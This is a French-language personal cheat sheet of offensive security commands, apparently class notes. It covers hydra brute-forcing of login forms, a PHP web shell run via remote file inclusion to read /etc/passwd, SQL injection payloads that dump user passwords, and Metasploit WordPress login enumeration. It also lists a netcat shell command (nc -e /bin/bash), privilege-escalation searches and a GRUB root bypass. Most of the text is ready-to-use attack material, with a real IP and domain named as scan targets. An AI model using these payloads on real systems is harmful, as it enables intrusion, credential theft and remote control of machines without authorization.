sécuritée


 hydra
-lpermet de définir le login ou le fichier de login-l admin
-l /file/nomlogin.txt
-P permet de définir le mot de passe ou le fichier de pass-P password
-P /file/password.txt
protocolesdefini le protocole utiliséehttp[s]-{head|get|post}
http[s]-{get|post}-form
http-proxy
http-proxy-urlenum
ldap2[s]
ldap3[-{cram|digest}md5][s]
mssql
mysql(v4)
mysql5
oracle
oracle-listener
oracle-sid
rexec
rlogin
smb
smtp[s]
ssh
sshkey
[-4|-6]definir l'ipv4 ou l'ipv6-4 192.168.1.1
-s specifie le port utilisee-s 3333
exemple sans cookiehydra -l user -P <chemin fichier password> [http-get-form|http-post-form] "</chemin/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect>"
exemple avec cookiehydra -l user -P <chemin fichier password> [http-get-form|http-post-form] "</chemin/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: security=low; PHPSESSID=23lsdr0b8sh18fat8vdeur2uf4">"
-Fexit apres avoir trouvé un login/password ok


remote file inclusion
Remote File Inclusion (RFI) est un type de vulnérabilité trouvé le plus souvent sur des sites web. Il permet à un attaquant d'inclure un fichier distant, généralement par le biais d'un script sur le serveur web. La vulnérabilité est due à l'utilisation de l'entrée fournie par l'utilisateur sans validation adéquate
file img.php :
###################
<?php
system($_GET['phoenix']);
?>
permet d'executer une commande sur le site cibleurl?phoenix=id
url?phoenix=cat%20../../../../etc/passwd


injection SQL
permet d'injecter dans un site une commande SQL
' '--inserer entre le debut de la demande et la fin (le serveur rajouteras une ' ) la commande souhaitée' OR '1'=1
recupere uand on connais les nom des tables'and '1'='0' union select null,concat(first_name,0x0a,last_name,user,0x3a,password) from users
connaitre la version mysql'and '1'='0' union select null, version()#
afficher les tables 'AND 1=2 UNION SELECT CONCAT(table_schema,0x0a,table_name),null,null,null,null FROM information_schema.tables#
afficher les tables'AND 1=2 UNION SELECT CONCAT(COLUMN_NAME),null,null,null,null FROM INFORMATION_SCHEMA.COLUMNS#


metalsploit
searchsploitpermet de rechercher un exploit dans la basesearchsploit wordpress login
msfconsolepermet de lancer la console metalsploit
searchpermet de rechercher un exploit dans la msfconsolesearch wordpress_login_enum
show optionsaffiche la listes des options disponibles pour l'exploit
use <auxiliary/scanner/http/wordpress_login_enum >utilise un exploit en particulierva lancer un exploit en mode interactif
wordpress_login_enumset usernamedefini le username pour l'exploit
set rhosts defini le hoste à attaquer
set targeturidefini l'url sur le serveur à attaquer
set pass_filefichier dictionnaire de mot de passe
set stop_on_success sarrete des que trouvee
exploitrun l'exploit avec les paramètres definis


tp2 (a trier)
nmap [ip] -sP connaitre les hotes sur le réseau
nmap -An <ip;>connaitre les port ouvert d'une machine
pdftotexttransforme un pdf en texte dans le paquet poppler
netstat -plantsaffiches les connexions
binwalk -h stegaographic tools
foremost recuperer des fichiers caches
stringsaffiche toutes les chaines de caractere d'un fichier
exrexpermet de génerer toutes les possibilite sur une chaine
zsteg steganographie toolsexemple zsteg b1,rgb,lsb,y
xxdconvertisseur hexadecimal
nikto -url 82.65.105.229 permet de connaitre la version d'apache
dirb http://www.domotrix.frmapper un site
https://gtfobins.github.io/#permet l'escalade de privilege
python -m SimpleHTTPServercree un serveur python petit
brainfuck
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/escalade de privilege
https://www.shodan.io/liste des version vulnerablesport:22 libssh country="FR"
arp-scan -lpermet de voir les hotes du reseau
find / -perm -u=s -type f 2>/dev/nullpermet de voir les fichier ou le sticky bit est positionnee
url?cmd=nc -lnvp 1234ouvre uneconnexion sur le port 1234
nc -e /bin/bash <ip> <port>ouvre une connection
pidofconnaitre le nom d'un processus
fgforeground
bgbackground
uname -aavoir les information sur la version
python -c 'import pty;pty.spawn("/bin/bash")'
fcrackzipcraquer les mot de passes zip
#!/bin/bash List=`nmap 192.168.1.1/24 -sP | sed 's/^Nmap scan report for \([0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\).*$/\1/' | grep "^[0-9]"` echo $List a=0; for i in $List; do echo $i echo "------------------" port=`nmap -An "$i" |grep "^[0-9]"` echo $port echo "------------------" done
openssl openssl x509 -inform DER -in <fichier> -text


exemple: certificat et clef de dépots sudo curl -O https://www.virtualbox.org/download/oracle_vbox_2016.asc sudo apt-key add oracle_vbox_2016.asc
Gruben mode édition (e) changer ro en rw puis "init=/bin/bash"
cat /etc/passwd | cut -d: -f1,7 |grep "/bin"
bloquer la réponse au ping echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf sysctl -p /etc/sysctl.conf
updatedb pour mettre à jour metasploit